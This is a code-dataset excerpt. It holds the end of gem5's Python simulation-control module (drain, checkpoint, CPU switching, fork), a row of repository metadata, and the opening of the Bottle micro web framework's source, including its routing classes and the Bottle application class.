            pass

    if options.dot_config:
        do_dot(root, options.outdir, options.dot_config)
        do_ruby_dot(root, options.outdir, options.dot_config)

    # Initialize the global statistics
    stats.initSimStats()

    # Create the C++ sim objects and connect ports
    for obj in root.descendants(): obj.createCCObject()
    for obj in root.descendants(): obj.connectPorts()

    # Do a second pass to finish initializing the sim objects
    for obj in root.descendants(): obj.init()

    # Do a third pass to initialize statistics
    stats._bindStatHierarchy(root)
    root.regStats()

    # Do a fourth pass to initialize probe points
    for obj in root.descendants(): obj.regProbePoints()

    # Do a fifth pass to connect probe listeners
    for obj in root.descendants(): obj.regProbeListeners()

    # We want to generate the DVFS diagram for the system. This can only be
    # done once all of the CPP objects have been created and initialised so
    # that we are able to figure out which object belongs to which domain.
    if options.dot_dvfs_config:
        do_dvfs_dot(root, options.outdir, options.dot_dvfs_config)

    # We're done registering statistics. Enable the stats package now.
    stats.enable()

    # Restore checkpoint (if any)
    if ckpt_dir:
        _drain_manager.preCheckpointRestore()
        ckpt = _m5.core.getCheckpoint(ckpt_dir)
        for obj in root.descendants(): obj.loadState(ckpt)
    else:
        for obj in root.descendants(): obj.initState()

    # Check to see if any of the stat events are in the past after resuming from
    # a checkpoint, If so, this call will shift them to be at a valid time.
    updateStatEvents()
need_startup = True
def simulate(*args, **kwargs):
    """Run the event-driven simulation, forwarding all arguments to
    _m5.event.simulate().

    On the first call, startup() is invoked on every SimObject, the
    stats-dump and C++ cleanup handlers are registered with atexit, and
    stats are reset.  Returns the exit event produced by the event loop.
    """
    global need_startup

    if need_startup:
        root = objects.Root.getInstance()
        for obj in root.descendants(): obj.startup()
        need_startup = False

        # Python exit handlers happen in reverse order.
        # We want to dump stats last.
        atexit.register(stats.dump)

        # register our C++ exit callback function with Python
        atexit.register(_m5.core.doExitCleanup)

        # Reset to put the stats in a consistent state.
        stats.reset()

    if _drain_manager.isDrained():
        _drain_manager.resume()

    # We flush stdout and stderr before and after the simulation to ensure the
    # output arrive in order.
    sys.stdout.flush()
    sys.stderr.flush()
    sim_out = _m5.event.simulate(*args, **kwargs)
    sys.stdout.flush()
    sys.stderr.flush()

    return sim_out
def drain():
    """Drain the simulator in preparation of a checkpoint or memory mode
    switch.

    This operation is a no-op if the simulator is already in the
    Drained state.
    """

    # Try to drain all objects. Draining might not be completed unless
    # all objects return that they are drained on the first call. This
    # is because as objects drain they may cause other objects to no
    # longer be drained.
    def _drain():
        # Try to drain the system. The drain is successful if all
        # objects are done without simulation. We need to simulate
        # more if not.
        if _drain_manager.tryDrain():
            return True

        # WARNING: if a valid exit event occurs while draining, it
        # will not get returned to the user script
        exit_event = _m5.event.simulate()
        while exit_event.getCause() != 'Finished drain':
            exit_event = simulate()

        return False

    # Don't try to drain a system that is already drained
    is_drained = _drain_manager.isDrained()
    # Keep retrying: a successful pass of _drain() may un-drain other
    # objects, so loop until a pass reports success.
    while not is_drained:
        is_drained = _drain()

    assert _drain_manager.isDrained(), "Drain state inconsistent"
def memWriteback(root):
    """Invoke memWriteback() on every object in the hierarchy below *root*."""
    for descendant in root.descendants():
        descendant.memWriteback()
def memInvalidate(root):
    """Invoke memInvalidate() on every object in the hierarchy below *root*."""
    for descendant in root.descendants():
        descendant.memInvalidate()
def checkpoint(dir):
    """Serialize simulator state into *dir*.

    Drains the simulator and writes memory back before serializing.

    Raises:
        TypeError: if the configured instance is not a Root object.
    """
    root = objects.Root.getInstance()
    if not isinstance(root, objects.Root):
        raise TypeError("Checkpoint must be called on a root object.")

    # Quiesce the event queues and flush dirty memory state first.
    drain()
    memWriteback(root)
    print("Writing checkpoint")
    _m5.core.serializeAll(dir)
def _changeMemoryMode(system, mode):
    """Set *system*'s memory mode to *mode* if it differs from the current one.

    Raises:
        TypeError: if *system* is neither a Root nor a System object.
    """
    if not isinstance(system, (objects.Root, objects.System)):
        raise TypeError("Parameter of type '%s'. Must be type %s or %s." % \
              (type(system), objects.Root, objects.System))
    if system.getMemoryMode() == mode:
        # Nothing to do; keep the caller informed.
        print("System already in target mode. Memory mode unchanged.")
        return
    system.setMemoryMode(mode)
def switchCpus(system, cpuList, verbose=True):
    """Switch CPUs in a system.

    Note: This method may switch the memory mode of the system if that
    is required by the CPUs. It may also flush all caches in the
    system.

    Arguments:
      system -- Simulated system.
      cpuList -- (old_cpu, new_cpu) tuples
      verbose -- print a message when the switch starts (default: True)

    Raises:
      RuntimeError or TypeError if the tuple list is malformed, a CPU
      does not support handover, a new CPU is already active, or the new
      CPUs disagree on the required memory mode.
    """
    if verbose:
        print("switching cpus")

    if not isinstance(cpuList, list):
        raise RuntimeError("Must pass a list to this function")
    for item in cpuList:
        if not isinstance(item, tuple) or len(item) != 2:
            raise RuntimeError("List must have tuples of (oldCPU,newCPU)")

    old_cpus = [old_cpu for old_cpu, new_cpu in cpuList]
    new_cpus = [new_cpu for old_cpu, new_cpu in cpuList]
    old_cpu_set = set(old_cpus)
    # All new CPUs must agree on one memory mode; the first is the reference.
    memory_mode_name = new_cpus[0].memory_mode()
    for old_cpu, new_cpu in cpuList:
        if not isinstance(old_cpu, objects.BaseCPU):
            raise TypeError("%s is not of type BaseCPU" % old_cpu)
        if not isinstance(new_cpu, objects.BaseCPU):
            raise TypeError("%s is not of type BaseCPU" % new_cpu)
        if new_cpu in old_cpu_set:
            raise RuntimeError(
                "New CPU (%s) is in the list of old CPUs." % (old_cpu,))
        if not new_cpu.switchedOut():
            raise RuntimeError("New CPU (%s) is already active." % (new_cpu,))
        if not new_cpu.support_take_over():
            raise RuntimeError(
                "New CPU (%s) does not support CPU handover." % (old_cpu,))
        if new_cpu.memory_mode() != memory_mode_name:
            raise RuntimeError(
                "%s and %s require different memory modes." % (new_cpu,
                                                               new_cpus[0]))
        if old_cpu.switchedOut():
            raise RuntimeError("Old CPU (%s) is inactive." % (new_cpu,))
        if not old_cpu.support_take_over():
            raise RuntimeError(
                "Old CPU (%s) does not support CPU handover." % (old_cpu,))

    try:
        memory_mode = _memory_modes[memory_mode_name]
    except KeyError:
        raise RuntimeError("Invalid memory mode (%s)" % memory_mode_name)

    drain()

    # Now all of the CPUs are ready to be switched out
    for old_cpu, new_cpu in cpuList:
        old_cpu.switchOut()

    # Change the memory mode if required. We check if this is needed
    # to avoid printing a warning if no switch was performed.
    if system.getMemoryMode() != memory_mode:
        # Flush the memory system if we are switching to a memory mode
        # that disables caches. This typically happens when switching to a
        # hardware virtualized CPU.
        if memory_mode == objects.params.atomic_noncaching:
            memWriteback(system)
            memInvalidate(system)

        _changeMemoryMode(system, memory_mode)

    for old_cpu, new_cpu in cpuList:
        new_cpu.takeOverFrom(old_cpu)
def notifyFork(root):
    """Invoke notifyFork() on every object in the hierarchy below *root*."""
    for descendant in root.descendants():
        descendant.notifyFork()
fork_count = 0
def fork(simout="%(parent)s.f%(fork_seq)i"):
    """Fork the simulator.

    This function forks the simulator. After forking the simulator,
    the child process gets its output files redirected to a new output
    directory. The default name of the output directory is the same as
    the parent with the suffix ".fN" added where N is the fork
    sequence number. The name of the output directory can be
    overridden using the simout keyword argument.

    Output file formatting dictionary:
      parent -- Path to the parent process's output directory.
      fork_seq -- Fork sequence number.
      pid -- PID of the child process.

    Keyword Arguments:
      simout -- New simulation output directory.

    Return Value:
      pid of the child process or 0 if running in the child.
    """
    from m5 import options
    global fork_count

    # Forking with active listeners would leave both processes sharing
    # the same sockets.
    if not _m5.core.listenersDisabled():
        raise RuntimeError("Can not fork a simulator with listeners enabled")

    # Drain first so no events are in flight across the fork.
    drain()

    try:
        pid = os.fork()
    except OSError as e:
        raise e

    if pid == 0:
        # In child, notify objects of the fork
        root = objects.Root.getInstance()
        notifyFork(root)
        # Setup a new output directory
        parent = options.outdir
        options.outdir = simout % {
                "parent" : parent,
                "fork_seq" : fork_count,
                "pid" : os.getpid(),
            }
        _m5.core.setOutputDir(options.outdir)
    else:
        # In parent: bump the sequence number used to name the next child's
        # output directory.
        fork_count += 1

    return pid
from _m5.core import disableAllListeners, listenersDisabled
from _m5.core import listenersLoopbackOnly
from _m5.core import curTick
| 35.318421
| 80
| 0.681469
|
4a05097ceefec07a2924d2a19e1da7e6c513f02d
| 142,135
|
py
|
Python
|
traad/bottle.py
|
abingham/traad
|
815020cf0758606fec6bfa7d8ca8e918f377a64d
|
[
"MIT"
] | 74
|
2015-01-10T20:02:41.000Z
|
2021-09-29T15:05:42.000Z
|
traad/bottle.py
|
abingham/traad
|
815020cf0758606fec6bfa7d8ca8e918f377a64d
|
[
"MIT"
] | 37
|
2015-01-06T08:56:43.000Z
|
2022-02-18T06:51:32.000Z
|
traad/bottle.py
|
abingham/traad
|
815020cf0758606fec6bfa7d8ca8e918f377a64d
|
[
"MIT"
] | 16
|
2015-08-02T13:14:58.000Z
|
2022-02-17T00:14:08.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bottle is a fast and simple micro-framework for small web applications. It
offers request dispatching (Routes) with url parameter support, templates,
a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and
template engines - all in a single file and with no dependencies other than the
Python Standard Library.
Homepage and documentation: http://bottlepy.org/
Copyright (c) 2013, Marcel Hellkamp.
License: MIT (see LICENSE for details)
"""
from __future__ import with_statement
__author__ = 'Marcel Hellkamp'
__version__ = '0.13-dev'
__license__ = 'MIT'
# The gevent server adapter needs to patch some modules before they are imported
# This is why we parse the commandline parameters here but handle them later
if __name__ == '__main__':
    from optparse import OptionParser
    # Command-line interface for running bottle as a script; parsed here so
    # that the gevent monkey-patching (below) can happen before other imports.
    _cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app")
    _opt = _cmd_parser.add_option  # shorthand for add_option
    _opt("--version", action="store_true", help="show version number.")
    _opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
    _opt("-s", "--server", default='wsgiref', help="use SERVER as backend.")
    _opt("-p", "--plugin", action="append", help="install additional plugin/s.")
    _opt("--debug", action="store_true", help="start server in debug mode.")
    _opt("--reload", action="store_true", help="auto-reload on file changes.")
    _cmd_options, _cmd_args = _cmd_parser.parse_args()
    # gevent must monkey-patch the stdlib before anything else imports it.
    if _cmd_options.server and _cmd_options.server.startswith('gevent'):
        import gevent.monkey; gevent.monkey.patch_all()
import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\
os, re, subprocess, sys, tempfile, threading, time, warnings
from datetime import date as datedate, datetime, timedelta
from tempfile import TemporaryFile
from traceback import format_exc, print_exc
from inspect import getargspec
try: from simplejson import dumps as json_dumps, loads as json_lds
except ImportError: # pragma: no cover
try: from json import dumps as json_dumps, loads as json_lds
except ImportError:
try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds
except ImportError:
def json_dumps(data):
raise ImportError("JSON support requires Python 2.6 or simplejson.")
json_lds = json_dumps
# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities.
# It ain't pretty but it works... Sorry for the mess.
py = sys.version_info
py3k = py >= (3, 0, 0)
py25 = py < (2, 6, 0)
py31 = (3, 1, 0) <= py < (3, 2, 0)
# Workaround for the missing "as" keyword in py3k.
def _e(): return sys.exc_info()[1]
# Workaround for the "print is a keyword/function" Python 2/3 dilemma
# and a fallback for mod_wsgi (resticts stdout/err attribute access)
try:
_stdout, _stderr = sys.stdout.write, sys.stderr.write
except IOError:
_stdout = lambda x: sys.stdout.write(x)
_stderr = lambda x: sys.stderr.write(x)
# Lots of stdlib and builtin differences.
if py3k:
import http.client as httplib
import _thread as thread
from urllib.parse import urljoin, SplitResult as UrlSplitResult
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie
try:
from collections.abc import MutableMapping as DictMixin
except ImportError:
from collections import MutableMapping as DictMixin
import pickle
from io import BytesIO
from configparser import ConfigParser
basestring = str
unicode = str
json_loads = lambda s: json_lds(touni(s))
callable = lambda x: hasattr(x, '__call__')
imap = map
def _raise(*a): raise a[0](a[1]).with_traceback(a[2])
else: # 2.x
import httplib
import thread
from urlparse import urljoin, SplitResult as UrlSplitResult
from urllib import urlencode, quote as urlquote, unquote as urlunquote
from Cookie import SimpleCookie
from itertools import imap
import cPickle as pickle
from StringIO import StringIO as BytesIO
from ConfigParser import SafeConfigParser as ConfigParser
if py25:
msg = "Python 2.5 support may be dropped in future versions of Bottle."
warnings.warn(msg, DeprecationWarning)
from UserDict import DictMixin
def next(it): return it.next()
bytes = str
else: # 2.6, 2.7
from collections import MutableMapping as DictMixin
unicode = unicode
json_loads = json_lds
eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
# Some helpers for string/byte handling
def tob(s, enc='utf8'):
    """ Coerce *s* to a byte string, encoding text with *enc*. """
    if isinstance(s, unicode):
        return s.encode(enc)
    return bytes(s)
def touni(s, enc='utf8', err='strict'):
    """ Coerce *s* to a text string, decoding byte strings with *enc*.
        None becomes the empty string; other objects are str()-converted. """
    if isinstance(s, bytes):
        return s.decode(enc, err)
    return unicode("" if s is None else s)
# The "native" string type is text on py3 and bytes on py2.
tonat = touni if py3k else tob
# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense).
# 3.1 needs a workaround.
if py31:
    from io import TextIOWrapper
    class NCTextIOWrapper(TextIOWrapper):
        # "NC" = non-closing: cgi closes its wrapper, but the underlying
        # wsgi.input buffer must stay open for later reads.
        def close(self): pass # Keep wrapped buffer open.
# A bug in functools causes it to break if the wrapper is an instance method
def update_wrapper(wrapper, wrapped, *a, **ka):
    """ Like :func:`functools.update_wrapper`, but silently ignore objects
        (e.g. instance methods) that lack the attributes being copied. """
    try:
        functools.update_wrapper(wrapper, wrapped, *a, **ka)
    except AttributeError:
        pass
# These helpers are used at module level and need to be defined first.
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.
def depr(message, hard=False):
    """ Emit a DeprecationWarning attributed to the caller of the
        deprecated API (hence stacklevel=3). *hard* is accepted for
        API compatibility but currently unused. """
    warnings.warn(message, category=DeprecationWarning, stacklevel=3)
def makelist(data):
    """ Coerce *data* into a list: containers are copied element-wise,
        truthy scalars are wrapped, falsy values yield an empty list. """
    if isinstance(data, (tuple, list, set, dict)):
        return list(data)
    return [data] if data else []
class DictProperty(object):
    ''' Descriptor whose value lives under a key of a dict-like attribute of
        the owner instance (e.g. the WSGI environ). The value is computed
        lazily on first access and cached in that dict. '''

    def __init__(self, attr, key=None, read_only=False):
        self.attr = attr
        self.key = key
        self.read_only = read_only

    def __call__(self, func):
        # Decorator usage: remember the getter and default the storage
        # key to the decorated function's name.
        functools.update_wrapper(self, func, updated=[])
        self.getter = func
        self.key = self.key or func.__name__
        return self

    def __get__(self, obj, cls):
        if obj is None:
            return self
        storage = getattr(obj, self.attr)
        if self.key not in storage:
            storage[self.key] = self.getter(obj)
        return storage[self.key]

    def __set__(self, obj, value):
        if self.read_only:
            raise AttributeError("Read-Only property.")
        getattr(obj, self.attr)[self.key] = value

    def __delete__(self, obj):
        # Deleting drops the cached value; the next read recomputes it.
        if self.read_only:
            raise AttributeError("Read-Only property.")
        del getattr(obj, self.attr)[self.key]
class cached_property(object):
    ''' A property that is only computed once per instance and then replaces
        itself with an ordinary attribute. Deleting the attribute resets the
        property.

        Works because this is a *non-data* descriptor: once the value is
        stored in the instance __dict__, attribute lookup finds it first. '''

    def __init__(self, func):
        self.__doc__ = getattr(func, '__doc__')
        self.func = func

    def __get__(self, obj, cls):
        if obj is None:
            return self
        result = self.func(obj)
        obj.__dict__[self.func.__name__] = result
        return result
class lazy_attribute(object):
    ''' A property computed once per *class* and then cached as a plain
        class attribute, shadowing this descriptor for later lookups. '''

    def __init__(self, func):
        functools.update_wrapper(self, func, updated=[])
        self.getter = func

    def __get__(self, obj, cls):
        result = self.getter(cls)
        setattr(cls, self.__name__, result)
        return result
###############################################################################
# Exceptions and Events ########################################################
###############################################################################
class BottleException(Exception):
    """ Common base class for all exceptions raised by bottle itself. """
    pass
###############################################################################
# Routing ######################################################################
###############################################################################
class RouteError(BottleException):
    """ Base class for all routing related exceptions. """
class RouteReset(BottleException):
    """ If raised by a plugin or request handler, the route is reset
        (its cached callback is discarded) and all plugins are re-applied. """
class RouterUnknownModeError(RouteError): pass  # NOTE(review): no raiser visible in this chunk; presumably for unsupported router modes.
class RouteSyntaxError(RouteError):
    """ The route parser found something not supported by this router
        (e.g. a wildcard pattern that does not compile). """
class RouteBuildError(RouteError):
    """ The URL for a route could not be built (unknown name or missing
        wildcard argument). """
def _re_flatten(p):
''' Turn all capturing groups in a regular expression pattern into
non-capturing groups. '''
if '(' not in p: return p
return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))',
lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p)
class Router(object):
    ''' A Router is an ordered collection of route->target pairs. It is used to
        efficiently match WSGI requests against a number of routes and return
        the first target that satisfies the request. The target may be anything,
        usually a string, ID or callable object. A route consists of a path-rule
        and a HTTP method.
        The path-rule is either a static path (e.g. `/contact`) or a dynamic
        path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax
        and details on the matching order are described in docs:`routing`.
    '''
    default_pattern = '[^/]+'
    default_filter = 're'
    #: The current CPython regexp implementation does not allow more
    #: than 99 matching groups per regular expression.
    _MAX_GROUPS_PER_PATTERN = 99
    def __init__(self, strict=False):
        self.rules = [] # All rules in order
        self._groups = {} # index of regexes to find them in dyna_routes
        self.builder = {} # Data structure for the url builder
        self.static = {} # Search structure for static routes
        self.dyna_routes = {}
        self.dyna_regexes = {} # Search structure for dynamic routes
        #: If true, static routes are no longer checked first.
        self.strict_order = strict
        # Built-in wildcard filters. Each maps a config string to a
        # (regexp, to_python, to_url) triple; the callables may be None.
        self.filters = {
            're': lambda conf:
                (_re_flatten(conf or self.default_pattern), None, None),
            'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))),
            'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))),
            'path': lambda conf: (r'.+?', None, None)}
    def add_filter(self, name, func):
        ''' Add a filter. The provided function is called with the configuration
        string as parameter and must return a (regexp, to_python, to_url) tuple.
        The first element is a string, the last two are callables or None. '''
        self.filters[name] = func
    rule_syntax = re.compile('(\\\\*)'\
        '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\
        '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\
        '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))')
    def _itertokens(self, rule):
        ''' Split *rule* into a stream of (literal, None, None) and
            (name, filter, config) wildcard tokens. '''
        offset, prefix = 0, ''
        for match in self.rule_syntax.finditer(rule):
            prefix += rule[offset:match.start()]
            g = match.groups()
            if len(g[0])%2: # Escaped wildcard
                prefix += match.group(0)[len(g[0]):]
                offset = match.end()
                continue
            if prefix:
                yield prefix, None, None
            # Old ':name' syntax fills groups 1-3, new '<name>' fills 4-6.
            name, filtr, conf = g[4:7] if g[2] is None else g[1:4]
            yield name, filtr or 'default', conf or None
            offset, prefix = match.end(), ''
        if offset <= len(rule) or prefix:
            yield prefix+rule[offset:], None, None
    def add(self, rule, method, target, name=None):
        ''' Add a new rule or replace the target for an existing rule. '''
        anons = 0 # Number of anonymous wildcards found
        keys = [] # Names of keys
        pattern = '' # Regular expression pattern with named groups
        filters = [] # Lists of wildcard input filters
        builder = [] # Data structure for the URL builder
        is_static = True
        for key, mode, conf in self._itertokens(rule):
            if mode:
                is_static = False
                if mode == 'default': mode = self.default_filter
                mask, in_filter, out_filter = self.filters[mode](conf)
                if not key:
                    pattern += '(?:%s)' % mask
                    key = 'anon%d' % anons
                    anons += 1
                else:
                    pattern += '(?P<%s>%s)' % (key, mask)
                    keys.append(key)
                if in_filter: filters.append((key, in_filter))
                builder.append((key, out_filter or str))
            elif key:
                pattern += re.escape(key)
                builder.append((None, key))
        self.builder[rule] = builder
        if name: self.builder[name] = builder
        if is_static and not self.strict_order:
            self.static.setdefault(method, {})
            self.static[method][self.build(rule)] = (target, None)
            return
        try:
            re_pattern = re.compile('^(%s)$' % pattern)
            re_match = re_pattern.match
        except re.error:
            raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e()))
        if filters:
            def getargs(path):
                url_args = re_match(path).groupdict()
                for name, wildcard_filter in filters:
                    try:
                        url_args[name] = wildcard_filter(url_args[name])
                    except ValueError:
                        raise HTTPError(400, 'Path has wrong format.')
                return url_args
        elif re_pattern.groupindex:
            def getargs(path):
                return re_match(path).groupdict()
        else:
            getargs = None
        flatpat = _re_flatten(pattern)
        whole_rule = (rule, flatpat, target, getargs)
        if (flatpat, method) in self._groups:
            if DEBUG:
                msg = 'Route <%s %s> overwrites a previously defined route'
                warnings.warn(msg % (method, rule), RuntimeWarning)
            self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule
        else:
            self.dyna_routes.setdefault(method, []).append(whole_rule)
            self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1
        self._compile(method)
    def _compile(self, method):
        ''' (Re-)combine all dynamic rules for *method* into batched regexes
            of at most _MAX_GROUPS_PER_PATTERN alternatives each. '''
        all_rules = self.dyna_routes[method]
        comborules = self.dyna_regexes[method] = []
        maxgroups = self._MAX_GROUPS_PER_PATTERN
        for x in range(0, len(all_rules), maxgroups):
            some = all_rules[x:x+maxgroups]
            combined = (flatpat for (_, flatpat, _, _) in some)
            combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)
            combined = re.compile(combined).match
            rules = [(target, getargs) for (_, _, target, getargs) in some]
            comborules.append((combined, rules))
    def build(self, _name, *anons, **query):
        ''' Build an URL by filling the wildcards in a rule. Positional
            arguments fill anonymous wildcards; keyword arguments left over
            after filling named wildcards become the query string. '''
        builder = self.builder.get(_name)
        if not builder: raise RouteBuildError("No route with that name.", _name)
        try:
            for i, value in enumerate(anons): query['anon%d'%i] = value
            url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder])
            return url if not query else url+'?'+urlencode(query)
        except KeyError:
            raise RouteBuildError('Missing URL argument: %r' % _e().args[0])
    def match(self, environ):
        ''' Return a (target, url_args) tuple or raise HTTPError(400/404/405). '''
        verb = environ['REQUEST_METHOD'].upper()
        path = environ['PATH_INFO'] or '/'
        target = None
        # HEAD falls back to GET handlers; everything falls back to ANY.
        methods = [verb, 'GET', 'ANY'] if verb == 'HEAD' else [verb, 'ANY']
        for method in methods:
            if method in self.static and path in self.static[method]:
                target, getargs = self.static[method][path]
                return target, getargs(path) if getargs else {}
            elif method in self.dyna_regexes:
                for combined, rules in self.dyna_regexes[method]:
                    match = combined(path)
                    if match:
                        target, getargs = rules[match.lastindex - 1]
                        return target, getargs(path) if getargs else {}
        # No matching route found. Collect alternative methods for 405 response
        allowed = set([])
        nocheck = set(methods)
        for method in set(self.static) - nocheck:
            if path in self.static[method]:
                # BUGFIX: was `allowed.add(verb)`, which advertised the
                # *requested* method in the Allow header instead of the
                # method that actually has a route for this path.
                allowed.add(method)
        for method in set(self.dyna_regexes) - allowed - nocheck:
            for combined, rules in self.dyna_regexes[method]:
                match = combined(path)
                if match:
                    allowed.add(method)
        if allowed:
            allow_header = ",".join(sorted(allowed))
            raise HTTPError(405, "Method not allowed.", Allow=allow_header)
        # No matching route and no alternative method found. We give up
        raise HTTPError(404, "Not found: " + repr(path))
class Route(object):
    ''' This class wraps a route callback along with route specific metadata and
        configuration and applies Plugins on demand. It is also responsible for
        turning an URL path rule into a regular expression usable by the Router.
    '''
    def __init__(self, app, rule, method, callback, name=None,
                 plugins=None, skiplist=None, **config):
        #: The application this route is installed to.
        self.app = app
        #: The path-rule string (e.g. ``/wiki/:page``).
        self.rule = rule
        #: The HTTP method as a string (e.g. ``GET``).
        self.method = method
        #: The original callback with no plugins applied. Useful for introspection.
        self.callback = callback
        #: The name of the route (if specified) or ``None``.
        self.name = name or None
        #: A list of route-specific plugins (see :meth:`Bottle.route`).
        self.plugins = plugins or []
        #: A list of plugins to not apply to this route (see :meth:`Bottle.route`).
        self.skiplist = skiplist or []
        #: Additional keyword arguments passed to the :meth:`Bottle.route`
        #: decorator are stored in this dictionary. Used for route-specific
        #: plugin configuration and meta-data.
        self.config = ConfigDict().load_dict(config)
    @cached_property
    def call(self):
        ''' The route callback with all plugins applied. This property is
            created on demand and then cached to speed up subsequent requests.'''
        return self._make_callback()
    def reset(self):
        ''' Forget any cached values. The next time :attr:`call` is accessed,
            all plugins are re-applied. '''
        self.__dict__.pop('call', None)
    def prepare(self):
        ''' Do all on-demand work immediately (useful for debugging).'''
        self.call
    def all_plugins(self):
        ''' Yield all Plugins affecting this route, app-level plugins first,
            honoring the route's skiplist (by instance, type, name or True). '''
        unique = set()
        for p in reversed(self.app.plugins + self.plugins):
            if True in self.skiplist: break
            name = getattr(p, 'name', False)
            if name and (name in self.skiplist or name in unique): continue
            if p in self.skiplist or type(p) in self.skiplist: continue
            if name: unique.add(name)
            yield p
    def _make_callback(self):
        ''' Apply all plugins to the raw callback and return the result. '''
        callback = self.callback
        for plugin in self.all_plugins():
            try:
                if hasattr(plugin, 'apply'):
                    callback = plugin.apply(callback, self)
                else:
                    callback = plugin(callback)
            except RouteReset: # Try again with changed configuration.
                return self._make_callback()
            if not callback is self.callback:
                update_wrapper(callback, self.callback)
        return callback
    def get_undecorated_callback(self):
        ''' Return the callback. If the callback is a decorated function, try to
            recover the original function by following closure cells. '''
        func = self.callback
        func = getattr(func, '__func__' if py3k else 'im_func', func)
        closure_attr = '__closure__' if py3k else 'func_closure'
        while hasattr(func, closure_attr) and getattr(func, closure_attr):
            func = getattr(func, closure_attr)[0].cell_contents
        return func
    def get_callback_args(self):
        ''' Return a list of argument names the callback (most likely) accepts
            as keyword arguments. If the callback is a decorated function, try
            to recover the original function before inspection. '''
        return getargspec(self.get_undecorated_callback())[0]
    def get_config(self, key, default=None):
        ''' Lookup a config field and return its value, first checking the
            route.config, then route.app.config.'''
        # BUGFIX: was `self.app.conifg` (typo), which raised AttributeError
        # whenever the lookup fell through to the application config.
        for conf in (self.config, self.app.config):
            if key in conf:
                return conf[key]
        return default
    def __repr__(self):
        cb = self.get_undecorated_callback()
        return '<%s %r %r>' % (self.method, self.rule, cb)
###############################################################################
# Application Object ###########################################################
###############################################################################
class Bottle(object):
    """ Each Bottle object represents a single, distinct web application and
        consists of routes, callbacks, plugins, resources and configuration.
        Instances are callable WSGI applications.

        :param catchall: If true (default), handle all exceptions. Turn off to
                         let debugging middleware handle exceptions.
        :param autojson: If true (default), install :class:`JSONPlugin` so
                         dict return values are serialized to JSON.
    """
    def __init__(self, catchall=True, autojson=True):
        #: A :class:`ConfigDict` for app specific configuration.
        self.config = ConfigDict()
        # Forward config changes to the 'config' hook so listeners can react.
        self.config._on_change = functools.partial(self.trigger_hook, 'config')
        self.config.meta_set('autojson', 'validate', bool)
        self.config.meta_set('catchall', 'validate', bool)
        self.config['catchall'] = catchall
        self.config['autojson'] = autojson
        #: A :class:`ResourceManager` for application files
        self.resources = ResourceManager()
        self.routes = [] # List of installed :class:`Route` instances.
        self.router = Router() # Maps requests to :class:`Route` instances.
        self.error_handler = {}  # status code -> error handler callable
        # Core plugins
        self.plugins = [] # List of installed plugins.
        if self.config['autojson']:
            self.install(JSONPlugin())
        self.install(TemplatePlugin())
    #: If true, most exceptions are caught and returned as :exc:`HTTPError`
    catchall = DictProperty('config', 'catchall')
    # Recognised hook names; hooks listed in __hook_reversed run in reverse
    # registration order (see add_hook).
    __hook_names = 'before_request', 'after_request', 'app_reset', 'config'
    __hook_reversed = 'after_request'
    @cached_property
    def _hooks(self):
        # name -> list of registered callbacks
        return dict((name, []) for name in self.__hook_names)
    def add_hook(self, name, func):
        ''' Attach a callback to a hook. Three hooks are currently implemented:
            before_request
                Executed once before each request. The request context is
                available, but no routing has happened yet.
            after_request
                Executed once after each request regardless of its outcome.
            app_reset
                Called whenever :meth:`Bottle.reset` is called.
        '''
        if name in self.__hook_reversed:
            # Prepend so 'after_request' hooks fire in reverse order.
            self._hooks[name].insert(0, func)
        else:
            self._hooks[name].append(func)
    def remove_hook(self, name, func):
        ''' Remove a callback from a hook. Return True on success. '''
        if name in self._hooks and func in self._hooks[name]:
            self._hooks[name].remove(func)
            return True
    def trigger_hook(self, __name, *args, **kwargs):
        ''' Trigger a hook and return a list of results. '''
        # Iterate over a copy so hooks may (un)register hooks safely.
        return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]
    def hook(self, name):
        """ Return a decorator that attaches a callback to a hook. See
            :meth:`add_hook` for details."""
        def decorator(func):
            self.add_hook(name, func)
            return func
        return decorator
    def mount(self, prefix, app, **options):
        ''' Mount an application (:class:`Bottle` or plain WSGI) to a specific
            URL prefix. Example::
                root_app.mount('/admin/', admin_app)
            :param prefix: path prefix or `mount-point`. If it ends in a slash,
                that slash is mandatory.
            :param app: an instance of :class:`Bottle` or a WSGI application.
            All other parameters are passed to the underlying :meth:`route` call.
        '''
        segments = [p for p in prefix.split('/') if p]
        if not segments: raise ValueError('Empty path prefix.')
        path_depth = len(segments)
        # Proxy callback: shift the prefix from PATH_INFO to SCRIPT_NAME,
        # run the mounted app, and collect its status/headers/body into an
        # HTTPResponse for the outer application to return.
        def mountpoint_wrapper():
            try:
                request.path_shift(path_depth)
                rs = HTTPResponse([])
                def start_response(status, headerlist, exc_info=None):
                    if exc_info:
                        try:
                            _raise(*exc_info)
                        finally:
                            exc_info = None
                    rs.status = status
                    for name, value in headerlist: rs.add_header(name, value)
                    return rs.body.append
                body = app(request.environ, start_response)
                if body and rs.body: body = itertools.chain(rs.body, body)
                rs.body = body or rs.body
                return rs
            finally:
                request.path_shift(-path_depth)
        options.setdefault('skip', True)
        options.setdefault('method', 'ANY')
